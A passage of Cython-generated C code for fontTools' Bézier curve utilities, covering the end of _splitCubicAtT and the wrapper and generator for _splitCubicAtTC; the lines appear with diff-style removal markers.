= PyTuple_New(2); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 757, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_11); - __Pyx_INCREF(__pyx_v_d1x); - __Pyx_GIVEREF(__pyx_v_d1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_11, 0, __pyx_v_d1x)) __PYX_ERR(0, 757, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d1y); - __Pyx_GIVEREF(__pyx_v_d1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_11, 1, __pyx_v_d1y)) __PYX_ERR(0, 757, __pyx_L1_error); - __pyx_t_12 = NULL; - __pyx_t_13 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_12 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_12)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_12); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_13 = 1; - } - } - 
#endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_12, __pyx_t_8, __pyx_t_9, __pyx_t_10, __pyx_t_11}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_13, 4+__pyx_t_13); - __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_4))) || (PyList_CheckExact(__pyx_t_4))) { - PyObject* sequence = __pyx_t_4; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 756, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_11 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_11 = PyList_GET_ITEM(sequence, 1); - __pyx_t_10 = PyList_GET_ITEM(sequence, 2); - __pyx_t_9 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(__pyx_t_9); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_11,&__pyx_t_10,&__pyx_t_9}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_1,&__pyx_t_11,&__pyx_t_10,&__pyx_t_9}; - __pyx_t_8 = PyObject_GetIter(__pyx_t_4); if 
(unlikely(!__pyx_t_8)) __PYX_ERR(0, 756, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_8); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_5(__pyx_t_8); if (unlikely(!item)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_8), 4) < 0) __PYX_ERR(0, 756, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - goto __pyx_L14_unpacking_done; - __pyx_L13_unpacking_failed:; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 756, __pyx_L1_error) - __pyx_L14_unpacking_done:; - } - - /* "fontTools/misc/bezierTools.py":756 - * d1x = ax * t1_3 + bx * t1_2 + cx * t1 + dx - * d1y = ay * t1_3 + by * t1_2 + cy * t1 + dy - * pt1, pt2, pt3, pt4 = calcCubicPoints( # <<<<<<<<<<<<<< - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - */ - __Pyx_XDECREF_SET(__pyx_v_pt1, __pyx_t_1); - __pyx_t_1 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt2, __pyx_t_11); - __pyx_t_11 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt3, __pyx_t_10); - __pyx_t_10 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt4, __pyx_t_9); - __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":759 - * (a1x, a1y), (b1x, b1y), (c1x, c1y), (d1x, d1y) - * ) - * segments.append((pt1, pt2, pt3, pt4)) # <<<<<<<<<<<<<< - * return segments - * - */ - __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 759, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_pt1)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_v_pt2)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_v_pt3)) __PYX_ERR(0, 759, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_pt4)) __PYX_ERR(0, 759, __pyx_L1_error); - __pyx_t_3 = __Pyx_PyList_Append(__pyx_v_segments, __pyx_t_4); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 759, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":737 - * cx, cy = c - * dx, dy = d - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":760 - * ) - * segments.append((pt1, pt2, pt3, pt4)) - * return segments # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_segments); - __pyx_r = __pyx_v_segments; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_XDECREF(__pyx_t_12); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ts); - __Pyx_XDECREF(__pyx_v_segments); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_i); - __Pyx_XDECREF(__pyx_v_t1); - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v_delta); - __Pyx_XDECREF(__pyx_v_delta_2); - __Pyx_XDECREF(__pyx_v_delta_3); - __Pyx_XDECREF(__pyx_v_t1_2); - __Pyx_XDECREF(__pyx_v_t1_3); - 
__Pyx_XDECREF(__pyx_v_a1x); - __Pyx_XDECREF(__pyx_v_a1y); - __Pyx_XDECREF(__pyx_v_b1x); - __Pyx_XDECREF(__pyx_v_b1y); - __Pyx_XDECREF(__pyx_v_c1x); - __Pyx_XDECREF(__pyx_v_c1y); - __Pyx_XDECREF(__pyx_v_d1x); - __Pyx_XDECREF(__pyx_v_d1y); - __Pyx_XDECREF(__pyx_v_pt1); - __Pyx_XDECREF(__pyx_v_pt2); - __Pyx_XDECREF(__pyx_v_pt3); - __Pyx_XDECREF(__pyx_v_pt4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_45generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_43_splitCubicAtTC, "_splitCubicAtTC(double complex a, double complex b, double complex c, double complex d, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_44_splitCubicAtTC = {"_splitCubicAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_43_splitCubicAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_44_splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_a; - __pyx_t_double_complex __pyx_v_b; - __pyx_t_double_complex __pyx_v_c; - __pyx_t_double_complex __pyx_v_d; - PyObject *__pyx_v_ts = 0; - #if 
!CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 1); __PYX_ERR(0, 763, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 2); __PYX_ERR(0, 763, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 763, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, 3); __PYX_ERR(0, 763, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitCubicAtTC") < 0)) __PYX_ERR(0, 763, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - __pyx_v_b = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - __pyx_v_c = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, __pyx_L3_error) - __pyx_v_d = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 778, 
__pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitCubicAtTC", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 763, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_CLEAR(__pyx_v_ts); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitCubicAtTC", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, __pyx_empty_tuple, NULL); - if 
(unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 763, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_a = __pyx_v_a; - __pyx_cur_scope->__pyx_v_b = __pyx_v_b; - __pyx_cur_scope->__pyx_v_c = __pyx_v_c; - __pyx_cur_scope->__pyx_v_d = __pyx_v_d; - __pyx_cur_scope->__pyx_v_ts = __pyx_v_ts; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_ts); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_45generator1, __pyx_codeobj__3, (PyObject *) __pyx_cur_scope, __pyx_n_s_splitCubicAtTC_2, __pyx_n_s_splitCubicAtTC_2, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_45generator1(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - Py_ssize_t __pyx_t_4; - PyObject *(*__pyx_t_5)(PyObject *); - double __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject 
*__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - PyObject *(*__pyx_t_12)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtTC", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - case 1: goto __pyx_L8_resume_from_yield; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 763, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":779 - * ) - * def _splitCubicAtTC(a, b, c, d, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PySequence_List(__pyx_cur_scope->__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 779, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GOTREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_DECREF_SET(__pyx_cur_scope->__pyx_v_ts, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":780 - * def _splitCubicAtTC(a, b, c, d, *ts): - * ts = list(ts) - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * for i in range(len(ts) - 1): - */ - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_cur_scope->__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 780, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 780, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":781 - * ts = list(ts) - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_cur_scope->__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 781, 
__pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":782 - * ts.insert(0, 0.0) - * ts.append(1.0) - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_4 = PyObject_Length(__pyx_cur_scope->__pyx_v_ts); if (unlikely(__pyx_t_4 == ((Py_ssize_t)-1))) __PYX_ERR(0, 782, __pyx_L1_error) - __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_4 - 1)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (likely(PyList_CheckExact(__pyx_t_1)) || PyTuple_CheckExact(__pyx_t_1)) { - __pyx_t_2 = __pyx_t_1; __Pyx_INCREF(__pyx_t_2); - __pyx_t_4 = 0; - __pyx_t_5 = NULL; - } else { - __pyx_t_4 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 782, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - for (;;) { - if (likely(!__pyx_t_5)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #endif - if (__pyx_t_4 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_4); __Pyx_INCREF(__pyx_t_1); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 
782, __pyx_L1_error) - #endif - if (__pyx_t_4 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_1 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_4); __Pyx_INCREF(__pyx_t_1); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 782, __pyx_L1_error) - #else - __pyx_t_1 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 782, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } - } else { - __pyx_t_1 = __pyx_t_5(__pyx_t_2); - if (unlikely(!__pyx_t_1)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 782, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_1); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_i); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_i, __pyx_t_1); - __Pyx_GIVEREF(__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":783 - * ts.append(1.0) - * for i in range(len(ts) - 1): - * t1 = ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_cur_scope->__pyx_v_ts, __pyx_cur_scope->__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 783, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_6 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 783, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_cur_scope->__pyx_v_t1 = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":784 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * - */ - __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_cur_scope->__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 784, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_7 = __Pyx_PyObject_GetItem(__pyx_cur_scope->__pyx_v_ts, __pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 784, __pyx_L1_error) - 
